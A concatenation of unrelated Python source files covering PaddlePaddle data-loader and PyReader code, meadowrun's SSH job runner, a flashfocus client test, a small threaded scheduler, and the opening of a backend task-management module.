v.desc.need_check_feed() for v in self._feed_list
]
self._queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, self._keep_order)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer,
self._drop_last, False)
def _init_non_iterable(self):
lod_levels = []
dtypes = []
shape_concat = []
ranks = []
shapes = []
need_check_feed = []
for feed_data in self._feed_list:
dtypes.append(feed_data.dtype)
shape_concat.extend(feed_data.shape)
ranks.append(len(feed_data.shape))
shapes.append(feed_data.shape)
lod_levels.append(feed_data.lod_level)
need_check_feed.append(int(feed_data.desc.need_check_feed()))
queue_name = data_loader_unique_name_generator(
'lod_tensor_blocking_queue')
reader_name = data_loader_unique_name_generator('create_py_reader')
double_buffer_name = data_loader_unique_name_generator('double_buffer')
var = global_scope().var(queue_name)
self._queue = core.init_lod_tensor_blocking_queue(var, self._capacity,
self._keep_order)
if self._keep_order:
block = default_main_program().current_block()
else:
block = default_startup_program().current_block()
reader_var = block.create_var(name=reader_name)
dtype_int = [int(t) for t in dtypes]
block.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [reader_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'dtypes': dtype_int,
'need_check_feed': need_check_feed,
'ranks': ranks
})
reader_var.desc.set_dtypes(dtypes)
reader_var.persistable = True
reader_var.stop_gradient = True
if self._keep_order:
main_prog_var = reader_var
reader = main_prog_var
reader.reset = self._queue.reset
else:
main_prog_var = _copy_reader_var_(
default_main_program().current_block(), reader_var)
main_prog_var.stop_gradient = True
main_prog_var.persistable = True
reader = monkey_patch_reader_methods(main_prog_var)
if self._use_double_buffer:
double_buffer_reader = double_buffer(
reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
self._reader = reader
default_main_program().current_block().append_op(
type='read',
inputs={'Reader': [self._reader]},
outputs={'Out': self._feed_list},
attrs={'drop_last': self._drop_last})
@property
def queue(self):
return self._queue
@property
def iterable(self):
return self._iterable
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._tensor_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
if self._return_list:
data = self._reader.read_next_list()
for i in range(len(data)):
data[i] = data[i]._move_to_list()
return data
else:
return self._reader.read_next()
except StopIteration:
self._queue.close()
self._reset()
six.reraise(*sys.exc_info())
def start(self):
assert not self._iterable, "start() cannot be called when DataLoader is iterable"
self._start()
def reset(self):
assert not self._iterable, "reset() cannot be called when DataLoader is iterable"
self._reset()
def _start(self):
def __thread_main__(legacy_expected_place):
try:
# See _DataLoaderIterSingleProcess._thread_loop() for why set expected place here.
_set_expected_place(legacy_expected_place)
while not self._queue.wait_for_inited(1):
if self._exited:
return
for tensors in self._tensor_reader():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._queue.push(array):
break
self._queue.close()
self._thread = None
except Exception as ex:
self._queue.kill()
self._thread = None
logging.warning('Your reader has raised an exception!')
six.reraise(*sys.exc_info())
self._thread = threading.Thread(
target=__thread_main__, args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._queue.close()
self._exited = True
thread = self._thread
if thread is not None:
thread.join()
self._exited = False
self._reader.reset()
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
has_lod = False
for f in self._feed_list:
if f.lod_level != 0:
has_lod = True
break
if has_lod:
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
else:
reader = BatchedTensorProvider(
feed_list=self._feed_list,
place=core.CPUPlace(),
batch_size=batch_size,
generator=reader,
drop_last=drop_last)
self.set_batch_generator(reader, places=places)
return self
def set_sample_list_generator(self, reader, places=None):
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
with program_guard(Program(), Program()):
feeder = DataFeeder(
feed_list=self._feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(reader, multi_devices=False)
def __tensor_reader_impl__():
for slots in paddle_reader():
yield [slots[var.name] for var in self._feed_list]
self.set_batch_generator(__tensor_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
self._tensor_reader = reader
if self._iterable:
assert places is not None, "Places cannot be None when DataLoader is iterable"
self._places = _convert_places(places)
else:
if places is not None:
logging.info(
'places would be omitted when DataLoader is not iterable')
return self
class PyReader(DataLoaderBase):
r"""
Create a reader object for data feeding in Python.
Data would be prefetched using Python thread and be pushed
into a queue asynchronously. Data in the queue would be extracted
automatically when `Executor.run(...)` is called.
Args:
feed_list (list(Variable)|tuple(Variable)): feed variable list.
The variables should be created by :code:`fluid.layers.data()`.
capacity (int): capacity of the queue maintained in PyReader.
The unit is batch number. Set larger capacity if your reader
is fast.
use_double_buffer (bool): whether to use double_buffer_reader.
If use_double_buffer=True, PyReader would prefetch the next
batch of data asynchronously, which speeds up data feeding at the
cost of a little extra CPU or GPU memory, i.e., the memory of
one batch of input data.
iterable (bool): whether the created PyReader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
the name of each fed variable. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
Returns:
the created reader object.
Return type:
reader(Reader)
Examples:
1. If iterable = False, the created PyReader object is almost the
same as :code:`fluid.layers.py_reader()`. Operators would be
inserted into the program. The user should call :code:`start()`
before each epoch and catch the :code:`fluid.core.EOFException`
thrown by :code:`Executor.run()` when the epoch ends. Once the
exception is caught, the user should call :code:`reset()` to reset
the reader manually.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image_and_label(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label],
capacity=4,
iterable=False)
user_defined_reader = reader_creator_random_image_and_label(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE))
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(EPOCH_NUM):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
2. If iterable=True, the created PyReader object is decoupled from
the program. No operator would be inserted into the program.
In this case, the created reader is a Python generator, which
is iterable. The user should feed the data yielded by the PyReader
object into :code:`Executor.run(feed=...)`.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 10
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0, high=255, size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True, return_list=False)
user_defined_reader = reader_creator_random_image(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
3. If return_list=True, the return values would be presented as a list instead of a dict.
This is usually used in dygraph mode.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
ITER_NUM = 5
BATCH_SIZE = 10
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
yield np.random.uniform(low=0, high=255, size=[height, width]), \
np.random.random_integers(low=0, high=9, size=[1])
return reader
place = fluid.CPUPlace()
with fluid.dygraph.guard(place):
py_reader = fluid.io.PyReader(capacity=2, return_list=True)
user_defined_reader = reader_creator_random_image(784, 784)
py_reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
place)
for image, label in py_reader():
relu = fluid.layers.relu(image)
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False):
self._loader = DataLoader.from_generator(
feed_list, capacity, use_double_buffer, iterable, return_list)
@property
def queue(self):
return self._loader.queue
@property
def iterable(self):
return self._loader.iterable
def __iter__(self):
return self._loader.__iter__()
def __next__(self):
return self._loader.__next__()
def start(self):
'''
Start the data feeding thread.
Can only be called when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.start()
def reset(self):
'''
Reset the reader object after :code:`fluid.core.EOFException` is raised.
Can only be called when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.reset()
def decorate_sample_generator(self,
sample_generator,
batch_size,
drop_last=True,
places=None):
'''
Set the data source of the PyReader object.
The provided :code:`sample_generator` should be a Python generator,
which yields list(numpy.ndarray)-typed data of each sample.
:code:`places` must be set when the PyReader object is iterable.
If all inputs have no lods, this method is faster than
:code:`decorate_sample_list_generator(paddle.batch(sample_generator, ...))` .
Args:
sample_generator (generator): Python generator that yields
list(numpy.ndarray)-typed sample data.
batch_size (int): batch size. Must be larger than 0.
drop_last (bool): Whether to drop the last batch when sample number
is less than batch_size.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.array([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_generator(user_defined_generator,
batch_size=BATCH_SIZE,
places=[fluid.CPUPlace()])
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_generator(sample_generator, batch_size,
drop_last, places)
def decorate_sample_list_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields list(numpy.ndarray)-typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields
list(numpy.ndarray)-typed batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_generator, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.core.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_list_generator(reader, places)
def decorate_batch_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields numpy.ndarray-typed or LoDTensor-typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields LoDTensor-typed
batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
batch_image = np.random.uniform(low=0,
high=255,
size=[BATCH_SIZE, height, width])
batch_label = np.ones([BATCH_SIZE, 1])
batch_image = batch_image.astype('float32')
batch_label = batch_label.astype('int64')
yield batch_image, batch_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_batch_generator(user_defined_generator, fluid.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_batch_generator(reader, places)
class DatasetLoader(DataLoaderBase):
def __init__(self, dataset, places, drop_last):
assert isinstance(dataset, paddle.distributed.fleet.dataset.
DatasetBase), "dataset must be type of DatasetBase"
assert not in_dygraph_mode(
), "DatasetLoader is not supported in dygraph mode yet"
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
thread_num = len(places)
assert len(dataset.filelist) >= thread_num, \
"Filelist number of dataset {} must be not less than place number {}".format(len(dataset.filelist), thread_num)
if dataset.thread_num != 0 and dataset.thread_num != thread_num:
logging.warning('thread_num {} which is set in Dataset is ignored'.
format(dataset.thread_num))
dataset._set_thread(thread_num)
if isinstance(dataset, paddle.distributed.fleet.dataset.
InMemoryDataset) and dataset.queue_num > thread_num:
logging.warn("queue_num {} which is set in Dataset is ignored".
format(dataset.queue_num))
dataset._set_queue_num(thread_num)
self._dataset = dataset
use_slots = [
slot.name for slot in dataset.proto_desc.multi_slot_desc.slots
if slot.is_used
]
self._iterable_dataset = core.IterableDatasetWrapper(
dataset.dataset, use_slots,
_convert_places(places), dataset.proto_desc.batch_size, drop_last)
def __iter__(self):
self._dataset._finish_to_run()
self._dataset._prepare_to_run()
self._iterable_dataset._start()
return self
def __next__(self):
return self._iterable_dataset._next()
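# A minimal, illustrative sketch of the slot transposition performed by
# DygraphGeneratorLoader.set_sample_list_generator above: each batch of
# per-sample tuples is rearranged into per-variable "slots" (one list per fed
# variable). The sample shapes and dtypes below are arbitrary assumptions.
if __name__ == "__main__":
    import numpy as np

    # a batch of 4 samples, each an (image, label) pair
    batch = [
        (np.zeros([784], dtype="float32"), np.array([1], dtype="int64"))
        for _ in range(4)
    ]
    slots = []
    for items in batch:
        for i, item in enumerate(items):
            if len(slots) < len(items):
                slots.append([item])   # first sample: open one slot per variable
            else:
                slots[i].append(item)  # later samples: append to the matching slot
    # slots[0] now holds the 4 images and slots[1] the 4 labels, which is the
    # per-variable layout pushed into the blocking queue.
    print(len(slots), len(slots[0]))  # -> 2 4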
|
run_job_core.py
|
"""
This code belongs in run_job.py, but this is split out to avoid circular dependencies
"""
from __future__ import annotations
import abc
import asyncio
import dataclasses
import io
import pickle
import threading
from typing import (
Any,
Callable,
Coroutine,
Dict,
Generic,
List,
Literal,
Optional,
Tuple,
TypeVar,
Union,
cast,
)
import fabric
import paramiko.ssh_exception
from meadowrun.credentials import UsernamePassword
from meadowrun.meadowrun_pb2 import Job, ProcessState
_T = TypeVar("_T")
CloudProvider = "EC2", "AzureVM"
CloudProviderType = Literal["EC2", "AzureVM"]
async def _retry(
function: Callable[[], _T],
exception_types: Union[Exception, Tuple[Exception, ...]],
max_num_attempts: int = 5,
delay_seconds: float = 1,
) -> _T:
i = 0
while True:
try:
return function()
except exception_types as e: # type: ignore
i += 1
if i >= max_num_attempts:
raise
else:
print(f"Retrying on error: {e}")
await asyncio.sleep(delay_seconds)
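# A minimal, guarded usage sketch of _retry with a deliberately flaky callable;
# the callable, attempt counts and delay below are made-up illustration values.
if __name__ == "__main__":
    _attempts = {"n": 0}

    def _flaky() -> str:
        # fails twice, then succeeds
        _attempts["n"] += 1
        if _attempts["n"] < 3:
            raise ConnectionError("transient failure")
        return "ok"

    _result = asyncio.run(
        _retry(
            _flaky,
            cast(Exception, ConnectionError),
            max_num_attempts=5,
            delay_seconds=0.01,
        )
    )
    assert _result == "ok" and _attempts["n"] == 3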
class Host(abc.ABC):
@abc.abstractmethod
async def run_job(self, job: Job) -> JobCompletion[Any]:
pass
@dataclasses.dataclass(frozen=True)
class SshHost(Host):
"""
Tells run_function and related functions to connect to the remote machine over SSH
via the fabric library (https://www.fabfile.org/). fabric_kwargs are passed directly to
fabric.Connection().
"""
address: str
# these options are forwarded directly to Fabric
fabric_kwargs: Optional[Dict[str, Any]] = None
# If this field is populated, it will be a tuple of (cloud provider, region name).
# Cloud provider will be e.g. "EC2" indicating that we're running on e.g. an EC2
# instance allocated via instance_allocation.py, so we need to deallocate the job
# via the right InstanceRegistrar when we're done. region name indicates where
# the InstanceRegistrar that we used to allocate this job is.
cloud_provider: Optional[Tuple[CloudProviderType, str]] = None
async def run_job(self, job: Job) -> JobCompletion[Any]:
with fabric.Connection(
self.address, **(self.fabric_kwargs or {})
) as connection:
job_io_prefix = ""
try:
# assumes that meadowrun is installed in /var/meadowrun/env as per
# build_meadowrun_amis.md. Also uses the default working_folder, which
# should (but doesn't strictly need to) correspond to
# agent._set_up_working_folder
# retry the first command, as this is when we actually try to
# connect to the remote machine.
home_result = await _retry(
lambda: connection.run("echo $HOME", hide=True, in_stream=False),
(
cast(Exception, paramiko.ssh_exception.NoValidConnectionsError),
cast(Exception, TimeoutError),
),
)
if not home_result.ok:
raise ValueError(
"Error getting home directory on remote machine "
+ home_result.stdout
)
# in_stream is needed otherwise invoke listens to stdin, which pytest
# doesn't like
remote_working_folder = f"{home_result.stdout.strip()}/meadowrun"
mkdir_result = connection.run(
f"mkdir -p {remote_working_folder}/io", in_stream=False
)
if not mkdir_result.ok:
raise ValueError(
"Error creating meadowrun directory " + mkdir_result.stdout
)
job_io_prefix = f"{remote_working_folder}/io/{job.job_id}"
# serialize job_to_run and send it to the remote machine
with io.BytesIO(job.SerializeToString()) as job_to_run_serialized:
connection.put(
job_to_run_serialized, remote=f"{job_io_prefix}.job_to_run"
)
# fabric doesn't have any async APIs, which means that in order to run
# more than one fabric command at the same time, we need to have a
# thread per fabric command. We use an asyncio.Future here to make the
# API async, so from the user perspective, it feels like this function
# is async
# fabric is supposedly not threadsafe, but it seems to work as long as
# more than one connection is not being opened at the same time:
# https://github.com/fabric/fabric/pull/2010/files
result_future: asyncio.Future = asyncio.Future()
event_loop = asyncio.get_running_loop()
command = (
f"/var/meadowrun/env/bin/meadowrun-local --job-id {job.job_id} "
f"--working-folder {remote_working_folder}"
)
if self.cloud_provider is not None:
command += f" --cloud {self.cloud_provider[0]}"
command += f" --cloud-region-name {self.cloud_provider[1]}"
print(f"Running {command}")
def run_and_wait() -> None:
try:
# use meadowrun to run the job
returned_result = connection.run(command, in_stream=False)
event_loop.call_soon_threadsafe(
lambda r=returned_result: result_future.set_result(r)
)
except Exception as e2:
event_loop.call_soon_threadsafe(
lambda e2=e2: result_future.set_exception(e2)
)
threading.Thread(target=run_and_wait).start()
result = await result_future
# TODO consider using result.tail, result.stdout
# see if we got a normal return code
if result.return_code != 0:
raise ValueError(f"Process exited {result.return_code}")
with io.BytesIO() as result_buffer:
connection.get(f"{job_io_prefix}.process_state", result_buffer)
result_buffer.seek(0)
process_state = ProcessState()
process_state.ParseFromString(result_buffer.read())
if process_state.state == ProcessState.ProcessStateEnum.SUCCEEDED:
job_spec_type = job.WhichOneof("job_spec")
# we must have a result from functions, in other cases we can
# optionally have a result
if job_spec_type == "py_function" or process_state.pickled_result:
result = pickle.loads(process_state.pickled_result)
else:
result = None
return JobCompletion(
result,
process_state.state,
process_state.log_file_name,
process_state.return_code,
self.address,
)
else:
raise MeadowrunException(process_state)
finally:
if job_io_prefix:
remote_paths = " ".join(
[
f"{job_io_prefix}.job_to_run",
f"{job_io_prefix}.state",
f"{job_io_prefix}.result",
f"{job_io_prefix}.process_state",
f"{job_io_prefix}.initial_process_state",
]
)
try:
# -f so that we don't throw an error on files that don't
# exist
connection.run(f"rm -f {remote_paths}", in_stream=False)
except Exception as e:
print(
f"Error cleaning up files on remote machine: "
f"{remote_paths} {e}"
)
# TODO also clean up log files?
@dataclasses.dataclass(frozen=True)
class AllocCloudInstancesInternal:
"""Identical to AllocCloudInstances but all values must be set"""
logical_cpu_required_per_task: int
memory_gb_required_per_task: float
interruption_probability_threshold: float
num_concurrent_tasks: int
region_name: str
@dataclasses.dataclass
class JobCompletion(Generic[_T]):
"""Information about how a job completed"""
# TODO both JobCompletion and MeadowrunException should be revisited
result: _T
process_state: ProcessState._ProcessStateEnum.ValueType
log_file_name: str
return_code: int
public_address: str
class MeadowrunException(Exception):
def __init__(self, process_state: ProcessState) -> None:
super().__init__("Failure while running a meadowrun job: " + str(process_state))
self.process_state = process_state
@dataclasses.dataclass(frozen=True)
class RunMapHelper:
"""See run_map. This allows run_map to use EC2 or Azure VMs"""
region_name: str
allocated_hosts: Dict[str, List[str]]
# public_address, worker_id -> None
worker_function: Callable[[str, int], None]
fabric_kwargs: Dict[str, Any]
results_future: Coroutine[Any, Any, List[Any]]
@dataclasses.dataclass(frozen=True)
class ContainerRegistryHelper:
"""
Allows compile_environment_spec_to_container to use either AWS ECR, Azure CR, or
neither
"""
should_push: bool
username_password: Optional[UsernamePassword]
image_name: str
does_image_exist: bool
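# A minimal, guarded sketch of the thread-to-asyncio bridge used in
# SshHost.run_job above: a blocking call runs on its own thread and completes an
# asyncio.Future via call_soon_threadsafe. time.sleep stands in for the blocking
# fabric call; everything else mirrors the pattern above.
if __name__ == "__main__":
    import time

    async def _bridged_blocking_call() -> str:
        result_future: asyncio.Future = asyncio.Future()
        event_loop = asyncio.get_running_loop()

        def run_and_wait() -> None:
            try:
                time.sleep(0.05)  # stands in for connection.run(...)
                event_loop.call_soon_threadsafe(
                    lambda: result_future.set_result("done")
                )
            except Exception as e:
                event_loop.call_soon_threadsafe(
                    lambda e=e: result_future.set_exception(e)
                )

        threading.Thread(target=run_and_wait).start()
        return await result_future

    print(asyncio.run(_bridged_blocking_call()))  # -> done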
|
test_client.py
|
"""Test suite for flashfocus.client."""
from __future__ import unicode_literals
from threading import Thread
from time import sleep
from flashfocus.client import client_request_flash
def test_client_request_flash(stub_server):
p = Thread(target=stub_server.await_data)
p.start()
client_request_flash()
sleep(0.05)
p.join()
assert stub_server.data == [b"1"]
|
cron.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
class SchedulerService:
def __init__(self,app,**kwargs):
import sched
import time
self._jobs = []
self.sched = sched.scheduler(time.time, time.sleep)
def schedule(self,when,what,*args,**kwargs):
self._jobs.append((when,what,args))
self.repeat(when,what,args)
def repeat(self,interval, func, args):
interval = int(interval)
if interval:
from threading import Event, Thread
stopped = Event()
def loop():
while not stopped.wait(interval):
try:
func(*args)
except Exception as err:
print('SchedulerService ERROR', err)
t = Thread(target=loop)
t.daemon = True
t.start()
return stopped.set
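# A minimal, guarded usage sketch of SchedulerService.repeat: the returned
# callable (the Event's `set` method) stops the repeating job. The tick
# function and one-second interval below are arbitrary illustration values.
if __name__ == "__main__":
    import time

    ticks = []
    service = SchedulerService(app=None)
    stop = service.repeat(1, ticks.append, ('tick',))  # append 'tick' every second
    time.sleep(2.5)
    stop()          # stop the repeating job
    print(ticks)    # roughly ['tick', 'tick']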
|
task.py
|
""" Backend task management support """
import itertools
import logging
import os
import sys
import re
from enum import Enum
from tempfile import gettempdir
from multiprocessing import RLock
from threading import Thread
from typing import Optional, Any, Sequence, Callable, Mapping, Union
try:
# noinspection PyCompatibility
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import six
from collections import OrderedDict
from six.moves.urllib.parse import quote
from ...utilities.locks import RLock as FileRLock
from ...backend_interface.task.development.worker import DevWorker
from ...backend_api import Session
from ...backend_api.services import tasks, models, events, projects
from pathlib2 import Path
from ...utilities.pyhocon import ConfigTree, ConfigFactory
from ..base import IdObjectBase
from ..metrics import Metrics, Reporter
from ..model import Model
from ..setupuploadmixin import SetupUploadMixin
from ..util import make_message, get_or_create_project, get_single_result, \
exact_match_regex
from ...config import get_config_for_bucket, get_remote_task_id, TASK_ID_ENV_VAR, get_log_to_backend, \
running_remotely, get_cache_dir, DOCKER_IMAGE_ENV_VAR
from ...debugging import get_logger
from ...debugging.log import LoggerRoot
from ...storage.helper import StorageHelper, StorageError
from .access import AccessMixin
from .log import TaskHandler
from .repo import ScriptInfo
from ...config import config, PROC_MASTER_ID_ENV_VAR
class Task(IdObjectBase, AccessMixin, SetupUploadMixin):
""" Task manager providing task object access and management. Includes read/write access to task-associated
frames and models.
"""
_anonymous_dataview_id = '__anonymous__'
_development_tag = 'development'
_force_requirements = {}
_store_diff = config.get('development.store_uncommitted_code_diff', False)
class TaskTypes(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
training = 'training'
testing = 'testing'
inference = "inference"
data_processing = "data_processing"
application = "application"
monitor = "monitor"
controller = "controller"
optimizer = "optimizer"
service = "service"
qc = "qc"
custom = "custom"
class TaskStatusEnum(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
created = "created"
queued = "queued"
in_progress = "in_progress"
stopped = "stopped"
published = "published"
publishing = "publishing"
closed = "closed"
failed = "failed"
completed = "completed"
unknown = "unknown"
def __init__(self, session=None, task_id=None, log=None, project_name=None,
task_name=None, task_type=TaskTypes.training, log_to_backend=True,
raise_on_validation_errors=True, force_create=False):
"""
Create a new task instance.
:param session: Optional API Session instance. If not provided, a default session based on the system's
configuration will be used.
:type session: Session
:param task_id: Optional task ID. If not provided, a new task will be created using the API
and its information reflected in the resulting instance.
:type task_id: string
:param log: Optional log to be used. If not provided, an internal log shared with all backend objects will be
used instead.
:type log: logging.Logger
:param project_name: Optional project name, used only if a new task is created. The new task will be associated
with a project by this name. If no such project exists, a new project will be created using the API.
:type project_name: str
:param task_name: Optional task name, used only if a new task is created.
:type task_name: str
:param task_type: Optional task type, used only if a new task is created. Default is training task.
:type task_type: str (see tasks.TaskTypeEnum)
:param log_to_backend: If True, all calls to the task's log will be logged to the backend using the API.
This value can be overridden using the environment variable TRAINS_LOG_TASK_TO_BACKEND.
:type log_to_backend: bool
:param force_create: If True, a new task will always be created (task_id, if provided, will be ignored)
:type force_create: bool
"""
task_id = self._resolve_task_id(task_id, log=log) if not force_create else None
self.__edit_lock = None
super(Task, self).__init__(id=task_id, session=session, log=log)
self._project_name = None
self._storage_uri = None
self._input_model = None
self._output_model = None
self._metrics_manager = None
self._reporter = None
self._curr_label_stats = {}
self._raise_on_validation_errors = raise_on_validation_errors
self._parameters_allowed_types = (
six.string_types + six.integer_types + (six.text_type, float, list, tuple, dict, type(None))
)
self._app_server = None
self._files_server = None
self._initial_iteration_offset = 0
self._reload_skip_flag = False
if not task_id:
# generate a new task
